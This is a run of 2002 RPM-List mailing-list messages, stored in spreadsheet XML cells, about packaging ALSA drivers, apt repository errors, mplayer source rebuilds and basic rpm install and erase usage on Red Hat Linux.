&gt; alsa-driver for 2.4.18-10, although I don't have that kernel, to supply
&gt; the dependency for the rest of the alsa rpm's, and compiled the modules
&gt; from source.  It created the /dev files and all.That's what the "alsa-driver" is there for, create all the base files
excluding the kernel drivers. What I would suggest for dependency reasons
it to install an "alsa-kernel" for the original kernel (you've kept it,
right? ;-)) and install ALSA modules from source for custom kernels built
from source.&gt; Then wanted to make my own rpm for 2.4.19, so now I'm trying to rpmbuild
&gt; the alsa-kernel package.  Removed all alsa rpms, and tried my spec:
&gt; 
&gt; rpmbuild --ba alsa-driver.spec.mine --without oss --without isapnp
&gt; --without kernsrc
&gt; 
&gt; But I get this:
&gt; 
&gt; ==[long successful compile snipped]=====================================
&gt; RPM build errors:
&gt;       File listed twice: /dev/adsp
&gt;       File listed twice: /dev/amidi
&gt;       Installed (but unpackaged) file(s) found:
&gt;      /etc/makedev.d/00macros
&gt;      /etc/rc.d/init.d/alsasound
&gt; ========================================================================
&gt; 
&gt; Oh, and I think I've forgot to mention, I'm running beta-null :).Indeed : The rpm 4.1 snapshot in (null) has a few new features among which
having the build fail when files are present in the build root but not
listed in the %files section. I should remove them manually as part of the
build process... or maybe the new "%exclude /path/to/file" in the %files
section would do, but I don't know how older versions of rpm would handle
it. On my (null) build system, I've simply set the variable :
%_unpackaged_files_terminate_build 0Matthias--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</si>
  <si>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Matthias Saou wrote:
&gt; OK, I'll add this.Cool :)&gt; Requiring a file that isn't part of an rpm is not possible, no, except
&gt; maybe by stopping the build process if it isn't found... but that's errr...
&gt; ugly!
&gt; And I really think that for people who installed a kernel from sources, the
&gt; easiest is to install the alsa kernel drivers from source too...Yes, it is...  But then alsa-driver requires alsa-kernel, and I don't quite 
like --nodeps...&gt; This would be a tricky one since to use the "--with " feature of
&gt; rpmbuild, I think you'd need to add individual handling of each and every
&gt; card :-/That's ok.  I was only considering it for the sake of tweaking anyway, not 
for some real-world need :).&gt; That's what the "alsa-driver" is there for, create all the base files
&gt; excluding the kernel drivers. What I would suggest for dependency reasons
&gt; it to install an "alsa-kernel" for the original kernel (you've kept it,
&gt; right? ;-)) and install ALSA modules from source for custom kernels built
&gt; from source.Um...  I keep 2.4.18-12.2 for emergency sitations (like I forget to include 
keyboard support in kernel, dumb me), but alsa-kernel_2.4.18-10 does not 
require kernel-2.4.18-10, so that's ok.&gt; Matthias-silent-- 
... And on the seventh day, God was arrested for tresspassing.
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Axel wrote :&gt; I am now relaxed again ;), and pass this info on. Probably Matthias Saou
&gt; himself is "dude", and some package has hardwired a path in his build
&gt; directory. It would be nice to find out which and fix it, but I am using
&gt; too many of the freshrpm suite to narrow it down.Indeed, my usual login is "dude" (and has been since long before "The Big
Lebowsky" came out ;-)), and it seems the some programs wrongly hard code
my home directory when being compiled :-(
For instance :[dude@python dude]$ strings /usr/bin/gentoo | grep dude
/home/dude/
[dude@python dude]$ strings /usr/bin/xine | grep dude
/home/dude/redhat/tmp/xine-root/usr/share/localeThese should probably be considered bugs in the program's build process
(especially for xine, look at that!), I'll report them upstream if/when I
have some time.Thanks for noticing this!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</si>
  <si>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Hi Matthias,I think I could do help you out with new plugins package for gkrellm 2. 
Would you prefer to keep it as it is now, or package every plugin
separately?  The latter would be probably easier to maintain.-- 
\/ille SkyttÃ¤
ville.skytta at iki.fi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>I wish I could answer your question but my laptop does not have the digital stuff
hooked up :( so I so not know about it. I have an excellent ESS Maestro3 which OSS
supports pretty lame so I was forced to learn about ALSA.I have used these commands to explore ALSA and my chip:arecord -l   (list devices)
arecord -L   (list PCM decices)I get some output like this:&gt; arecord -l
card 0: MAESTRO3 [ESS Allegro PCI], device 0: Allegro [Allegro]
  Subdevices: 1/1
  Subdevice #0: subdevice #0&gt; arecord -L
PCM list:
 (SNIP - craploads of output)I noticed that the output from this commands kind of maps to what the alsamixer or
gamix have.For what it is worth, here is what I have in modules.conf for my sound stuff:&gt; ## ALSA portion
&gt; alias char-major-116 snd
&gt; ## OSS/Free portion
&gt; alias char-major-14 soundcore
&gt;
&gt; ## ALSA portion
&gt; alias snd-card-0 snd-maestro3
&gt; ## OSS/Free portion
&gt; alias sound-slot-0 snd-card-0
&gt;
&gt; ## OSS/Free portion - card #1
&gt; alias sound-service-0-0 snd-mixer-oss
&gt; # BAD alias sound-service-0-1 snd-seq-oss
&gt; alias sound-service-0-3 snd-pcm-oss
&gt; # BAD alias sound-service-0-8 snd-seq-oss
&gt; alias sound-service-0-12 snd-pcm-oss
&gt; #
&gt; ## ALSA Options (optional)
&gt; options snd snd_major=116 snd_cards_limit=1 snd_device_mode=0666
&gt; options snd-maestro3 snd_index=0 snd_id=MAESTRO3 snd_amp_gpio=8
&gt; #
&gt; ## OSS Options (optional)
&gt; alias snd-card-1 off
&gt; alias snd-card-2 off
&gt; alias snd-card-3 off
&gt; alias sound-slot-1 off
&gt; alias sound-service-1-0 off
&gt;
&gt; ## Preserve Mixer Settings
&gt; #post-install /usr/sbin/alsactl restore MAESTRO3
&gt; #pre-remove /usr/sbin/alsactl store MAESTRO3
&gt; post-install /usr/sbin/alsactl restore
&gt; pre-remove /usr/sbin/alsactl storeHope that helps, good luck.
Lance (lance_tt@bellsouth.net) wrote*:
&gt;
&gt;Hello,
&gt;
&gt;Thanks for these rpms, I removed the binary built from source (.tar.gz)
&gt;and installed your SRPM of gamix.  One quick question, is there a way to
&gt;switch between digital out and analog out with the ALSA driver and
&gt;utilities, or, for that matter, with gamix?  I know with the OSS drivers
&gt;I was using it was as simple as 'emu-config -d for digital and
&gt;emu-config -a for analog, with the emu-tools package for SBLive!  I
&gt;noticed there is SB Live Analog/Digital Output Jack in alsamixer but
&gt;haven't figured out the key to use, if this is the right control in
&gt;mixer.  Also, I tried to expand gamix to display all possible controls
&gt;but it defaults back to 'Wave' and 'Music'  With LFE, Center, Surround
&gt;and Playback under Wave (this is how I control output of front and rear
&gt;speakers for digital out...'Surround' and 'Playback')  Under 'Music'
&gt;there are two controls but unresponsive.  I have a tuner and cassette
&gt;deck hooked up to an audio/video switch that goes into 'Line In' on the
&gt;soundcard.  Again, with the OSS drivers, it was as simple as emu-config
&gt;-d and emu-config -a.  Digital out for anything coming from the
&gt;computer, analog out for the tuner and cassette deck.  I don't know if
&gt;this is necessary to switch inbetween to get 'Line In' to work or not,
&gt;but an expansion of gamix would help, where I could see all the
&gt;controls....
&gt;
&gt;Any help would be greatly appreciated and thanks again for the gamix
&gt;rpms.
&gt;
&gt;Kind Regards,
&gt;
&gt;Lance
&gt;--
&gt;:
&gt;####[ Linux One Stanza Tip (LOST) ]###########################
&gt;
&gt;Sub : Command line shortcuts (clear)                 LOST #310
&gt;
&gt;Tired of typing in "clear" every time you want the screen to
&gt;be cleared ? Press [Ctrl-L] ... This works for  most shells,
&gt;(except for ash, bsh and ksh)
&gt;
&gt;#############################################
&gt;:
&gt;--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Hello!i have just found a small issue with the downloader 4 x update. the ftp search engines are missing something like:%{_datadir}/d4x/ftpsearch.xml thanks in advance,
chep.s. i love the xmms-xosd plugin :)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>I've noted that there are packaged versions of
Blackbox and hackedbox available from FreshRPMs.  What
about FluxBox? http://fluxbox.sf.netI'd certainly enjoy a packaged version, since its
creators seem hesitant to provide .rpms (.debs, yes,
but no .rpms)..Doug__________________________________________________
Do You Yahoo!?
Yahoo! Finance - Get real-time stock quotes
http://finance.yahoo.com_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Back when I had regular RH7.3 there was nothing better than "apt-get upgrade". But
now I'm running (null) beta and I have these questions:which version of "apt" can I use, the RH7.3 version or the "rawhide" version?Is there a way to use apt to update (null) with the rpms available for (null)
through up2date, since I prefer apt to that?If I can use apt, can I use it to get updates from these 3 different places:
1. the (null) up2date Redhat upgrades
2. the (null) files at Freshrpms.net
3. the regular RH7.3 files from freshrpms.netAm I asking for too much simplicity in this complicated world?--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Thu, Sep 05, 2002 at 07:11:23AM +0000,  Angles  Puglisi wrote:
&gt; If I can use apt, can I use it to get updates from these 3 different places:
&gt; 1. the (null) up2date Redhat upgrades
&gt; 2. the (null) files at Freshrpms.net
&gt; 3. the regular RH7.3 files from freshrpms.netYou could build your own apt-repository. Just mirror the needed directories
(e.g. by using a wget cron job), symlink the needed rpms and recreate the
repository. It is already worth the trouble, if you have more than one
installation.In any case in order to acces the mentioned places, somebody must keep such a
repository up to date, be it yourself or someone else.
-- 
Axel.Thimm@physik.fu-berlin.de_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Thu, Sep 05, 2002 at 12:32:58PM +0200, Axel Thimm wrote:
&gt; On Thu, Sep 05, 2002 at 07:11:23AM +0000,  Angles  Puglisi wrote:
&gt; &gt; If I can use apt, can I use it to get updates from these 3 different
&gt; &gt; places:
&gt; &gt; 1. the (null) up2date Redhat upgrades
&gt; &gt; 2. the (null) files at Freshrpms.net
&gt; &gt; 3. the regular RH7.3 files from freshrpms.net
&gt; You could build your own apt-repository. Just mirror the needed
&gt; directories (e.g. by using a wget cron job), symlink the needed rpms
&gt; and recreate the repository. It is already worth the trouble, if you
&gt; have more than one installation.Always nice to have one to put stuff that overrides RH things. Like if
you absolutely detest qt and some programs are rebuildable from sources
with different %configure options. You can get src.rpm, edit spec, bump
release numberwith your initials and another number and rebuild, insert
into apt and let loose... :)Doesn't freshrpms have updates dir too? Maybe not quite as up to date as
up2date but still. I would never use up2date. There is another
repository at apt-rpm.tuxfamily.org IIRC. Not sure if that had The
updates._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>I spun another AlsaPlayer build, this time on my (null) box. I do not know what this
means but the Curl stuff compiled in this time.It's sounding damn cool with the new alsa drivers. Thanks to Matthias for the Alsa
RPMS. Great job bring sound to the masses.http://www.dudex.net/rpms/alsaplayer-0.99.71-aap2.i386.rpm
http://www.dudex.net/rpms/alsaplayer-0.99.71-aap2.i686.rpm
http://www.dudex.net/rpms/alsaplayer-0.99.71-aap2.src.rpm
http://www.dudex.net/rpms/alsaplayer-0.99.71.spec--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Hi All Folks,I have 'APT' installed and updated from 'freshmeat.net.  But I failed using it# apt-get install 
/mnt/cdrom/Linux/CDBurner/cdrtools-cdrecord-1.11a23-1.i386.rpm
Processing File Dependencies... Done
Reading Package Lists... Done
Building Dependency Tree... Done
E: Couldn't find package 
/mnt/cdrom/Linux/CDBurner/cdrtools-cdrecord-1.11a23-1.i386.rpmThe file 'cdrtools-cdrecord-1.11a23-1.i386.rpm' is thereI performed another test copying the file 
'cdrtools-cdrecord-1.11a23-1.i386.rpm' to /root/Download# apt-get install /root/Download/cdrtools-cdrecord-1.11a23-1.i386.rpm
Processing File Dependencies... Done
Reading Package Lists... Done
Building Dependency Tree... Done
E: Couldn't find package /root/Download/cdrtools-cdrecord-1.11a23-1.i386.rpmStill failed.  Finally I rpm 'cdrtools-cdrecord-1.11a23-1.i386.rpm' from the 
CD and suceeded.Kindly advise what mistake I have committed.Thanks in advance.Stephen Liu_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Stephen wrote :&gt; # apt-get install 
&gt; /mnt/cdrom/Linux/CDBurner/cdrtools-cdrecord-1.11a23-1.i386.rpmThis is not how apt is meant to be used, see Gordon's answer to your post
on the Valhalla list for details.Matthias--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</si>
  <si>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 xml:space="preserve">Hi,
this is my first problem with one of the freshrpms rpms ...
I just upgrade mplayer and now I get$ mplayer 
mplayer: error while loading shared libraries: libdvdnav.so.1: cannot open shared object file: No such file or directoryI guess Matthias has forgotten libdvdnav dependency.-- 
They told me I needed WIN95 or better
So I chose Linux!_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">    
 Hello,
         I just installed redhat 7.2 and I think I have everything 
working properly.  Anyway I want to install mplayer because I heard it 
can play quicktime movs.  I apt-get source mplayer and dl'd it to 
/usr/src.          I tried to just rpm --rebuild mplayer-20020106-fr1.src.rpm, 
then I get ; mplayer-20020106-fr1.src.rpm: No such file or directory.         Any help or a link to some document would be appreciated, Thanks
-rob
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Make sure you rebuild as root and you're in the directory that you
downloaded the file.  Also it might complain of a few dependencies but
you can get these at freshrpms.net, except for gcc3, which you can find
on your Red Hat cd, Red Hat ftp, or rpmfind.net.After you rebuild the source rpm it should install a binary rpm in
/usr/src/redhat/RPMS/i386.  With all dependencies met, install mplayer
with 'rpm -ivh mplayer-20020106-fr1.rpm' and you should be good to go.One last thing, you will need the win32 codecs, I found them on google,
create a directory /usr/lib/win32 and place the codecs in there.Good Luck!LanceOn Thu, 2002-01-31 at 23:44, rob bains wrote:
&gt;     
&gt;  Hello,
&gt;    
&gt;          I just installed redhat 7.2 and I think I have everything 
&gt; working properly.  Anyway I want to install mplayer because I heard it 
&gt; can play quicktime movs.  I apt-get source mplayer and dl'd it to 
&gt; /usr/src. 
&gt; 
&gt;          I tried to just rpm --rebuild mplayer-20020106-fr1.src.rpm, 
&gt; then I get ; mplayer-20020106-fr1.src.rpm: No such file or directory.
&gt; 
&gt;          Any help or a link to some document would be appreciated, Thanks
&gt; -rob
&gt; 
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Lance wrote:&gt;Make sure you rebuild as root and you're in the directory that you
&gt;downloaded the file.  Also it might complain of a few dependencies but
&gt;you can get these at freshrpms.net, except for gcc3, which you can find
&gt;on your Red Hat cd, Red Hat ftp, or rpmfind.net.
&gt;
&gt;After you rebuild the source rpm it should install a binary rpm in
&gt;/usr/src/redhat/RPMS/i386.  With all dependencies met, install mplayer
&gt;with 'rpm -ivh mplayer-20020106-fr1.rpm' and you should be good to go.
&gt;
&gt;One last thing, you will need the win32 codecs, I found them on google,
&gt;create a directory /usr/lib/win32 and place the codecs in there.
&gt;
&gt;Good Luck!
&gt;
&gt;Lance
&gt;
 I dl'd gcc3 and libgcc3, but I still get the same error message when I 
try rpm --rebuild or recompile. I do this as root, I dl'd as root also.thanks for the help, any more idea what's going on?&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt;         I tried to just rpm --rebuild mplayer-20020106-fr1.src.rpm, 
&gt;&gt;then I get ; mplayer-20020106-fr1.src.rpm: No such file or directory.
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;
&gt;
&gt;
&gt;
&gt;_______________________________________________
&gt;RPM-List mailing list 
&gt;http://lists.freshrpms.net/mailman/listinfo/rpm-list
&gt;
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, rob wrote :&gt;  I dl'd gcc3 and libgcc3, but I still get the same error message when I 
&gt; try rpm --rebuild or recompile. I do this as root, I dl'd as root also.
&gt; 
&gt; thanks for the help, any more idea what's going on?I've never installed source rpms with apt, but I suppose that if you get
file not found, it's because the source rpm was installed. To see if this
is the case, go to /usr/src/redhat/SPECS/ and if you see mplayer.spec,
you'll just need to do "rpm -bb mplayer.spec" to get a binary build in
/usr/src/redhat/RPMS/i386/Matthias--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</si>
  <si>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Harri wrote :&gt; Title page has a login screen and I can't seem to get the apt indexes
&gt; anymore. Is it just me or is something going on there?You can't get the file index from here either?
http://apt.nixia.no/apt/files/During the past few days, I've experienced connection problems with that
site from time to time, but for me right now it's working.Matthias--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</si>
  <si>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Harri wrote :&gt; &gt; You can't get the file index from here either?
&gt; &gt; http://apt.nixia.no/apt/files/
&gt; 
&gt; The requested URL /apt/files/ was not found on this server.Very strange then : It works fine from here, even shift-reloading and with
no proxy whatsoever!&gt; &gt; During the past few days, I've experienced connection problems with
&gt; &gt; that site from time to time, but for me right now it's working.
&gt; 
&gt; Maybe it's temporary :-/If you need another apt repository with Red Hat Linux 7.2 files, there are
a few others. See : http://freshrpms.net/apt/Matthias--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</si>
  <si>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and/or get it to unstall it?
Thanx in advance,
Brian French-French
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Brian wrote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it?You're a bit too vague on your "[rpm package]" here...
Maybe this will help you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</si>
  <si>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oh ok, thanx alot!! i was puttin the entire rpm package name like
php-4.0.4pl1.i386.rpm
that's why it wasn't working.-----Original Message-----
From: rpm-zzzlist-admin@freshrpms.net
[mailto:rpm-list-admin@freshrpms.net]On Behalf Of Matthias Saou (by way
of Matthias Saou )
Sent: Friday, February 01, 2002 1:18 PM
To: rpm-zzzlist@freshrpms.net
Subject: Re: Prob. w/ install/uninstall
Once upon a time, Brian wrote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it?You're a bit too vague on your "[rpm package]" here...
Maybe this will help you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apg]#You can just put the name, of the name and version, and even the release,
but the entire filename will not work!Matthias--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_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Fri, Feb 01, 2002 at 12:42:02PM -0500, Brian French wrote:
&gt; hey i have a problem:
&gt; i have a rpms that i have installed that i want to uninstall, i do it
&gt; like so:
&gt; rpm -e [rpm package]
&gt; and it gives the error: package not installed, so i install it like
&gt; so:
Its a little confusing but you install rpms like
rpm -ivh packagename-0.1.1.rpm 
uninstalls must be done without the version info like
rpm -e packagename   ie: rpm -e sendmail or 
rpm -e sendmail-devel. give that a go and it should work np. Phil,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&gt;  
&gt; Thanx in advance,
&gt; Brian French
&gt; 
&gt; -French
&gt; 
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list-- 
"I say, bring on the brand new renaissance. 'Cause I
think I'm ready. I've been shaking all night long...
But my hands are steady."  
Gord Downie    http://www.thehip.com
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Hiya, I always seem to get errors when I do an "apt update", is this a 
problem on the repository itself, or on my end, or possibly a timeout in 
the connection due to my connection being a crappy modem?[root@spawn root]# apt-get update
Hit http://apt.nixia.no redhat/7.2/i386/base/pkglist.gnomehide
Hit http://apt.freshrpms.net redhat/7.2/i386/base/pkglist.os
Ign http://apt.freshrpms.net redhat/7.2/i386 release.os
Err http://apt.freshrpms.net redhat/7.2/i386/base/pkglist.updates
  Bad header line
Hit http://apt.freshrpms.net redhat/7.2/i386 release.updates
Err http://apt.freshrpms.net redhat/7.2/i386/base/pkglist.freshrpms
  400 Bad Request
Err http://apt.freshrpms.net redhat/7.2/i386 release.freshrpms
  Bad header line
Hit http://apt.freshrpms.net redhat/7.2/i386/base/srclist.freshrpms
Ign http://apt.nixia.no redhat/7.2/i386 release.gnomehide
Ign http://apt.nixia.no redhat/7.2/i386/base/mirrors
Hit http://apt.freshrpms.net redhat/7.2/i386 release.freshrpms
Ign http://apt.freshrpms.net redhat/7.2/i386/base/mirrors
Ign http://apt.freshrpms.net redhat/7.2/i386/base/mirrors
Ign http://apt.freshrpms.net redhat/7.2/i386/base/mirrors
Ign http://apt.freshrpms.net redhat/7.2/i386/base/mirrors
Failed to fetch 
http://apt.freshrpms.net/redhat/7.2/i386/base/pkglist.updates
  Bad header line
Failed to fetch 
http://apt.freshrpms.net/redhat/7.2/i386/base/pkglist.freshrpms
  400 Bad Request
Failed to fetch 
http://apt.freshrpms.net/redhat/7.2/i386/base/release.freshrpms
  Bad header line                                    -- \m/ --
  "...if I seem super human I have been misunderstood." (c) Dream Theater
         mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>I have failed dependencies in RPM database to I am unable to use
apt-get.  I requests to run 'apt-get -f install' to fix these
dependencies, however, I get these errors when running 'apt-get -f
install' :[root@localhost root]# apt-get -f install
Processing File Dependencies... Done
Reading Package Lists... Done       
Building Dependency Tree... Done
Correcting dependencies... Done
The following extra packages will be installed:
  libgcj 
The following NEW packages will be installed:
  libgcj 
0 packages upgraded, 1 newly installed, 0 to remove(replace) and 68 not
upgraded.
Need to get 2407kB of archives. After unpacking 8598kB will be used.
Do you want to continue? [Y/n] Y
Get:1 http://apt-rpm.tuxfamily.org redhat-7.2-i386/redhat/os libgcj
2.96-27 [2407kB]
Fetched 2407kB in 22s
(105kB/s)                                                                                                                         
Executing RPM (-U)...
Preparing...                ###########################################
[100%]
   1:libgcj                 error: unpacking of archive failed on file
/usr/share/libgcj.zip;3c5b5e75: cpio: MD5 sum mismatch
E: Sub-process /bin/rpm returned an error code (1)
[root@localhost root]# _______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Mark wrote :&gt; Hiya, I always seem to get errors when I do an "apt update", is this a 
&gt; problem on the repository itself, or on my end, or possibly a timeout in 
&gt; the connection due to my connection being a crappy modem?
&gt; 
&gt; [root@spawn root]# apt-get update
&gt; Hit http://apt.nixia.no redhat/7.2/i386/base/pkglist.gnomehide
&gt; Hit http://apt.freshrpms.net redhat/7.2/i386/base/pkglist.os
&gt; Ign http://apt.freshrpms.net redhat/7.2/i386 release.os
&gt; Err http://apt.freshrpms.net redhat/7.2/i386/base/pkglist.updates
&gt;   Bad header line
&gt; Hit http://apt.freshrpms.net redhat/7.2/i386 release.updates
&gt; Err http://apt.freshrpms.net redhat/7.2/i386/base/pkglist.freshrpms
&gt;   400 Bad Request
&gt; Err http://apt.freshrpms.net redhat/7.2/i386 release.freshrpms
&gt;   Bad header line
&gt; Hit http://apt.freshrpms.net redhat/7.2/i386/base/srclist.freshrpms
&gt; Ign http://apt.nixia.no redhat/7.2/i386 release.gnomehide
&gt; Ign http://apt.nixia.no redhat/7.2/i386/base/mirrors
&gt; Hit http://apt.freshrpms.net redhat/7.2/i386 release.freshrpms
[...]It works for me (it should works with or without the "en" subdirectory).
Does it always give you the same error each time? Do you use an proxy
server?[root@python root]# apt-get update
Hit http://apt.freshrpms.net redhat/7.2/en/i386/base/srclist.os
Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.os
Hit http://apt.freshrpms.net redhat/7.2/en/i386/base/srclist.updates
Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.updates
Get:1 http://apt.freshrpms.net redhat/7.2/en/i386/base/pkglist.os [1035kB]
Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.os
Get:2 http://apt.freshrpms.net redhat/7.2/en/i386/base/pkglist.updates
[331kB] Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.updates
Hit http://apt.freshrpms.net redhat/7.2/en/i386/base/pkglist.freshrpms
Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.freshrpms
Hit http://apt.freshrpms.net redhat/7.2/en/i386/base/srclist.os
Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.os
Hit http://apt.freshrpms.net redhat/7.2/en/i386/base/srclist.updates
Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.updates
Hit http://apt.freshrpms.net redhat/7.2/en/i386/base/srclist.freshrpms
Hit http://apt.freshrpms.net redhat/7.2/en/i386 release.freshrpms
Ign http://apt.freshrpms.net redhat/7.2/en/$(ARCH)/base/mirrors
Ign http://apt.freshrpms.net redhat/7.2/en/$(ARCH)/base/mirrors
Ign http://apt.freshrpms.net redhat/7.2/en/$(ARCH)/base/mirrors
Fetched 1366kB in 1m16s (17.9kB/s)
Processing File Dependencies... Done
Reading Package Lists... Done       
Building Dependency Tree... Done
W: http://apt.freshrpms.net/ will not be authenticated.
W: http://apt.freshrpms.net/ will not be authenticated.
W: http://apt.freshrpms.net/ will not be authenticated.
[root@python root]#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</si>
  <si>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Lance wrote :&gt; I have failed dependencies in RPM database to I am unable to use
&gt; apt-get.  I requests to run 'apt-get -f install' to fix these
&gt; dependencies, however, I get these errors when running 'apt-get -f
&gt; install' :
[...]
&gt; error: unpacking of archive failed on file
&gt; /usr/share/libgcj.zip;3c5b5e75: cpio: MD5 sum mismatch
&gt; E: Sub-process /bin/rpm returned an error code (1)
&gt; [root@localhost root]# I'd say that the file apt downloaded is corrupted. Maybe trying "apt-get
clean" to remove all downloaded files first would solve the problem.Matthias--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</si>
  <si>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Hello,Tried 'apt-get clean' with same results.On Sat, 2002-02-02 at 06:08, Matthias Saou wrote:
&gt; Once upon a time, Lance wrote :
&gt; 
&gt; &gt; I have failed dependencies in RPM database to I am unable to use
&gt; &gt; apt-get.  I requests to run 'apt-get -f install' to fix these
&gt; &gt; dependencies, however, I get these errors when running 'apt-get -f
&gt; &gt; install' :
&gt; [...]
&gt; &gt; error: unpacking of archive failed on file
&gt; &gt; /usr/share/libgcj.zip;3c5b5e75: cpio: MD5 sum mismatch
&gt; &gt; E: Sub-process /bin/rpm returned an error code (1)
&gt; &gt; [root@localhost root]# 
&gt; 
&gt; I'd say that the file apt downloaded is corrupted. Maybe trying "apt-get
&gt; clean" to remove all downloaded files first would solve the problem.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
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Hi, I'm building an rpm for the resin webserver, and I basically want to 
install the entire tarball under a diretory, but, the tarball includes 
subdirectorys, in my spec i have:
install -s -m 755 %{name}-%{version}.%{release}/* \
  $RPM_BUILD_ROOT/usr/local/resinand I'm getting:install: `resin-2.0.5/bin' is a directory
install: `resin-2.0.5/conf' is a directoryIs there a proper/nice way I should handle this?
                                    -- \m/ --
  "...if I seem super human I have been misunderstood." (c) Dream Theater
         mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Fri, Feb 01, 2002 at 05:41:32PM +0200, Harri Haataja wrote:
&gt; I have a local one for the main and upgrades from somewhere plus my own
&gt; at $ORKPLACE.Olen ajatellut pystyttÃ¤Ã¤ itselleni lokaalin apt-varaston, kun Suomesta ei 
tunnu lÃ¶ytyvÃ¤n julkista peiliÃ¤. Osaisitko avittaa hiukan asiassa, eli 
kuinka lÃ¤hteÃ¤ liikkeelle? Ensin kannattanee peilata varsinainen RH:n rpm:t 
jostain, vaan millÃ¤ softalla (rsync?) ja mistÃ¤ (funet?) tuo kannattaa 
tehdÃ¤, ajatuksia?-- 
Peter
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Sorry about that :) Didn't think before sending... So I didn't realize that Reply-To was to 
the list and not to the sender (as it usually is). Anyawy, I was asking Harri if he could point me a few advices on how to 
build my own apt repositry for RH updates. There is a tutorial of somekind 
at http://apt-rpm.tuxfamily.org/ which I'm following right now, but if 
there is some other good advices, let me know!Regards,
Peter
On Mon, Feb 04, 2002 at 02:33:29PM +0200, Peter Peltonen wrote:
&gt; On Fri, Feb 01, 2002 at 05:41:32PM +0200, Harri Haataja wrote:
&gt; &gt; I have a local one for the main and upgrades from somewhere plus my own
&gt; &gt; at $ORKPLACE.
&gt; 
&gt; Olen ajatellut pystyttÃ¤Ã¤ itselleni lokaalin apt-varaston, kun Suomesta ei 
&gt; tunnu lÃ¶ytyvÃ¤n julkista peiliÃ¤. Osaisitko avittaa hiukan asiassa, eli 
&gt; kuinka lÃ¤hteÃ¤ liikkeelle? Ensin kannattanee peilata varsinainen RH:n rpm:t 
&gt; jostain, vaan millÃ¤ softalla (rsync?) ja mistÃ¤ (funet?) tuo kannattaa 
&gt; tehdÃ¤, ajatuksia?
&gt; 
&gt; -- 
&gt; Peter
&gt; 
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
&gt; -- 
Peter
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Peter wrote :&gt; On Fri, Feb 01, 2002 at 05:41:32PM +0200, Harri Haataja wrote:
&gt; &gt; I have a local one for the main and upgrades from somewhere plus my own
&gt; &gt; at $ORKPLACE.
&gt; 
&gt; Olen ajatellut pystyttÃ¤Ã¤ itselleni lokaalin apt-varaston, kun Suomesta ei
&gt; tunnu lÃ¶ytyvÃ¤n julkista peiliÃ¤. Osaisitko avittaa hiukan asiassa, eli 
&gt; kuinka lÃ¤hteÃ¤ liikkeelle? Ensin kannattanee peilata varsinainen RH:n
&gt; rpm:t jostain, vaan millÃ¤ softalla (rsync?) ja mistÃ¤ (funet?) tuo
